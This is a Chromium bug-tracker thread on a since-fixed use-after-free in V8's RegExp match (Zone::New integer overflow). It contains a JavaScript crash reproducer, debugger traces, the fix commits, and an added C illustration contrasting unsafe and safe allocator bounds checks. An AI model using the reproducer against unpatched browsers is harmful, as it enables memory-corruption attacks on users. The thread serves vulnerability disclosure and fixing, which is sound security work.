Starred by 1 user
Status: Fixed
Owner:
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security
Security: Use After Free in RegExp of V8
Reported by cwhan.t...@gmail.com, Apr 23 2016 Back to list
VULNERABILITY DETAILS
The "match" function with a very long string fails to properly allocate memory, thus a UAF occurs. 

VERSION
Windows Chrome 50.0.2661.87 32bit stable (V8 5.0.71.33)

REPRODUCTION CASE
--------------------------------
<script>
r2 = new RegExp("(?=)*", "g");
s0 = Array(220000700).join('a'); // the size could be different between v8 and chrome
result = s0.match(r2);
</script>
--------------------------------

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION

runtime/runtime-strings.cc
 334 RUNTIME_FUNCTION(Runtime_StringMatch) {
..
 349   ZoneScope zone_scope(isolate->runtime_zone());
 350   ZoneList<int> offsets(8, zone_scope.zone());
 351
 352   while (true) {
 353     int32_t* match = global_cache.FetchNext();
 354     if (match == NULL) break;
 355     offsets.Add(match[0], zone_scope.zone());  // start <----------
 356     offsets.Add(match[1], zone_scope.zone());  // end
 357   }
..

"Add" method invocation tries to resize ZoneList when the length of offsets reaches the capacity, but there's no limitation check.

The reproduction code sometimes causes a copy into freed memory in Chrome.

0:000> u
0550020f f30f7f47f0      movdqu  xmmword ptr [edi-10h],xmm0
05500214 89fa            mov     edx,edi
05500216 83e20f          and     edx,0Fh
05500219 2bfa            sub     edi,edx
0550021b 2bf2            sub     esi,edx
0550021d 2bca            sub     ecx,edx
0550021f 89ca            mov     edx,ecx
05500221 c1ea06          shr     edx,6
0:000> dd edi
46018020  ???????? ???????? ???????? ????????
46018030  ???????? ???????? ???????? ????????

+ 447e0000 4c400000  7c20000             MEM_FREE    PAGE_NOACCESS

In the d8 binary, the string pointer points to one of the elements of the offsets list.

v8::internal::Map::instance_type (this=0x240ec0c) at .././src/objects-inl.h:4268
4268      return static_cast<InstanceType>(READ_BYTE_FIELD(this, kInstanceTypeOffset));
(gdb) print this
$1 = (v8::internal::Map *) 0x240ec0c
(gdb) bt
#0  v8::internal::Map::instance_type (this=0x240ec0c) at .././src/objects-inl.h:4268
#1  0x08801ebf in v8::internal::HeapObject::IsString (this=0xf3708081) at .././src/objects-inl.h:164
#2  0x0886af5a in v8::internal::HeapObject::IsConsString (this=0xf3708081) at .././src/objects-inl.h:202
#3  0x0883347e in v8::internal::String::Flatten (string=..., pretenure=v8::internal::NOT_TENURED) at .././src/objects-inl.h:3421
#4  0x08c2831d in v8::internal::Factory::NewProperSubString (this=0xa1d2c38, str=..., begin=0, end=0) at ../src/factory.cc:597
#5  0x08e27ff0 in v8::internal::Factory::NewSubString (this=0xa1d2c38, str=..., begin=0, end=0) at .././src/factory.h:215
#6  0x093ed7b3 in v8::internal::__RT_impl_Runtime_StringMatch (args=..., isolate=0xa1d2c38) at ../src/runtime/runtime-strings.cc:372
#7  0x093ed256 in v8::internal::Runtime_StringMatch (args_length=3, args_object=0xffffd014, isolate=0xa1d2c38)
    at ../src/runtime/runtime-strings.cc:334
#8  0x2230b81c in ?? () 
 
Comment 1 by vakh@chromium.org, Apr 24 2016
Components: Blink>JavaScript
Owner: titzer@chromium.org
Status: Assigned
Thanks for the report! I've reproed this on the current stable Chrome.
+v8 folks. Could you please look into this, or find a more suitable owner?
Comment 2 by vakh@chromium.org, Apr 24 2016
Cc: jkummerow@chromium.org
Comment 3 by vakh@chromium.org, Apr 25 2016
Labels: Security_Severity-High
Marking Security_Severity-High based on the severity of other similar bugs.
Bug owners, please feel free to change it if this isn't appropriate.
Comment 4 by vakh@chromium.org, Apr 25 2016
Labels: Security_Impact-Stable
Cc: yangguo@chromium.org
Interesting. This seems not really regexp-related, but more an issue with the ZoneList, and could happen elsewhere that also uses a ZoneList.

But if I'm reading this correctly, the ZoneList uses the ZoneAllocationPolicy, which, when invoking .New(), should trigger V8::FatalProcessOutOfMemory if expanding the zone fails. I'm a bit puzzled by this. Trying to reproduce.
Cc: hpayer@chromium.org
Cc: titzer@chromium.org
Labels: Pri-1
Owner: hpayer@chromium.org
Project Member Comment 9 by sheriffbot@chromium.org, Apr 25 2016
Labels: M-50
Owner: yangguo@chromium.org
This is not a GC issue. Assigning to Yang since he is already working on it.
Owner: hablich@chromium.org
I have not been able to reproduce this and unfortunately have no time to work on this. Michael, could you find a new owner for this?
Cc: hablich@chromium.org
Owner: verwa...@chromium.org
Toon, I think you were talking about this yesterday? Is this the same thing?
Labels: merge-review-5.1 merge-review-5.0
I've debugged this with Toon yesterday. Fix: https://codereview.chromium.org/1930873002 (should be merged back after Canary coverage).
Owner: jkummerow@chromium.org
Awesome, thanks.
Project Member Comment 15 by clusterf...@chromium.org, Apr 28 2016
Status: Fixed
Please mark security bugs as fixed as soon as the fix lands, and before requesting merges.

- Your friendly ClusterFuzz
Project Member Comment 16 by clusterf...@chromium.org, Apr 29 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member Comment 17 by bugdroid1@chromium.org, Apr 29 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

commit 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73
Author: jkummerow <jkummerow@chromium.org>
Date: Fri Apr 29 11:53:59 2016

Fix overflow issue in Zone::New

When requesting a large allocation near the end of the address space,
the computation could overflow and erroneously *not* grow the Zone
as required.

BUG= chromium:606115 
LOG=y

Review-Url: https://codereview.chromium.org/1930873002
Cr-Commit-Position: refs/heads/master@{#35903}

[modify] https://crrev.com/3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73/src/zone.cc

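The commit message above describes the root cause: a bump-pointer check of the form "limit < position + size" wraps around when position is near the top of the address space and size is large (the reporter's PoC collects one pair of 32-bit offsets per empty match over a ~220M-character string, i.e. well over a gigabyte of ZoneList storage in a 32-bit process), so the zone is not grown and the copy runs into memory past the segment. The following C program is an added illustration of that bug class, not V8's zone.cc: it models a 32-bit bump allocator with hypothetical `needs_expand_unsafe` and `needs_expand_safe` checks and constructed addresses, and shows the wrapped comparison returning "fits" for a request that plainly does not.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Constructed model of a bump allocator in a 32-bit address space
 * (hypothetical, not V8's Zone). position is the next free byte in the
 * current segment, limit is one past its end; limit >= position always. */
typedef struct {
    uint32_t position;
    uint32_t limit;
} ZoneModel;

/* Overflow-prone check: position + size is computed in 32 bits and wraps
 * past 2^32, so a request that does not fit can compare as fitting. */
bool needs_expand_unsafe(const ZoneModel *z, uint32_t size) {
    return z->limit < z->position + size;
}

/* Safe check: limit - position is the remaining space and cannot wrap
 * because of the invariant limit >= position; compare the request to it. */
bool needs_expand_safe(const ZoneModel *z, uint32_t size) {
    return z->limit - z->position < size;
}

/* True when the unsafe check would hand out memory past the segment,
 * i.e. the safe check says "expand" but the unsafe one says "fits". */
bool unsafe_check_misses(const ZoneModel *z, uint32_t size) {
    return needs_expand_safe(z, size) && !needs_expand_unsafe(z, size);
}

int main(void) {
    /* Constructed: a 64 KiB segment sitting just below the top of the
     * 32-bit address space. */
    ZoneModel z = { .position = 0xFFF00000u, .limit = 0xFFF10000u };
    uint32_t small  = 0x8000u;      /* 32 KiB: fits in the 64 KiB left */
    uint32_t medium = 0x20000u;     /* 128 KiB: does not fit, no wrap */
    uint32_t huge   = 0x68000000u;  /* ~1.6 GiB: does not fit, sum wraps */

    printf("small:  unsafe=%d safe=%d\n",
           needs_expand_unsafe(&z, small), needs_expand_safe(&z, small));
    printf("medium: unsafe=%d safe=%d\n",
           needs_expand_unsafe(&z, medium), needs_expand_safe(&z, medium));
    printf("huge:   unsafe=%d safe=%d missed=%d\n",
           needs_expand_unsafe(&z, huge), needs_expand_safe(&z, huge),
           unsafe_check_misses(&z, huge));
    return 0;
}
```

For the huge request, 0xFFF00000 + 0x68000000 wraps to 0x67F00000, which is below the limit, so the unsafe check reports that the allocation fits and the caller would write 1.6 GiB starting at position; the subtraction form compares 0x68000000 against the 0x10000 bytes actually free and requests expansion. The general rule a reviewer applies to any bump or arena allocator: compute available space as limit - position and compare the request against that, never add the request to a pointer and compare the sum.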
Labels: -merge-review-5.1 -merge-review-5.0 Merge-Request-51 Merge-Request-50
Comment 19 by tin...@google.com, May 3 2016
Labels: -Merge-Request-51 Merge-Approved-51 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M51 (branch: 2704)
Comment 20 by tin...@google.com, May 3 2016
Labels: -Merge-Request-50 Merge-Review-50 Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M50), manual review required.
Comment 21 by tin...@google.com, May 3 2016
Labels: -Merge-Request-50 Merge-Review-50 Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M50), manual review required.
Project Member Comment 22 by bugdroid1@chromium.org, May 4 2016
Labels: merge-merged-5.1
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce

commit 36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce
Author: Jakob Kummerow <jkummerow@chromium.org>
Date: Wed May 04 11:05:53 2016

Version 5.1.281.28 (cherry-pick)

Merged 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

Fix overflow issue in Zone::New

BUG= chromium:606115 
LOG=N
R=cbruni@chromium.org

Review URL: https://codereview.chromium.org/1949973002 .

Cr-Commit-Position: refs/branch-heads/5.1@{#32}
Cr-Branched-From: 167dc63b4c9a1d0f0fe1b19af93644ac9a561e83-refs/heads/5.1.281@{#1}
Cr-Branched-From: 03953f52bd4a184983a551927c406be6489ef89b-refs/heads/master@{#35282}

[modify] https://crrev.com/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce/include/v8-version.h
[modify] https://crrev.com/36d0d2ed2a0d9088808b261f49d78f0a14b7d0ce/src/zone.cc

Cc: -titzer@chromium.org
Labels: -Merge-Review-50 Merge-Approved-50
Project Member Comment 25 by bugdroid1@chromium.org, May 4 2016
Labels: merge-merged-5.0
The following revision refers to this bug:
  https://chromium.googlesource.com/v8/v8.git/+/557b84becbfe9f6d10c281bb0b2dbb75403a497f

commit 557b84becbfe9f6d10c281bb0b2dbb75403a497f
Author: Jakob Kummerow <jkummerow@chromium.org>
Date: Wed May 04 14:17:19 2016

Version 5.0.71.47 (cherry-pick)

Merged 3a9bfecfe41737aaf0dbf92ce68352f8acaaaf73

Fix overflow issue in Zone::New

BUG= chromium:606115 
LOG=N
R=cbruni@chromium.org

Review URL: https://codereview.chromium.org/1945313002 .

Cr-Commit-Position: refs/branch-heads/5.0@{#56}
Cr-Branched-From: ad16e6c2cbd2c6b0f2e8ff944ac245561c682ac2-refs/heads/5.0.71@{#1}
Cr-Branched-From: bd9df50d75125ee2ad37b3d92c8f50f0a8b5f030-refs/heads/master@{#34215}

[modify] https://crrev.com/557b84becbfe9f6d10c281bb0b2dbb75403a497f/include/v8-version.h
[modify] https://crrev.com/557b84becbfe9f6d10c281bb0b2dbb75403a497f/src/zone.cc

Project Member Comment 26 by sheriffbot@chromium.org, May 7 2016
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Merge-Approved-50 -Hotlist-Merge-Approved -Hotlist-Merge-review -Merge-Approved-51
Labels: reward-topanel Release-3-M50
Comment 29 Deleted
Congratulations - $3000 for this report.

I'll add this to the next payment run - thanks again for the report! 
Labels: backport-review
Labels: reward-inprocess
Labels: -reward-unpaid
Project Member Comment 34 by sheriffbot@chromium.org, Aug 5 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -backport-review backport-done
Labels: -Backport-Done NodeJS-Backport-Done
Project Member Comment 37 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 38 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic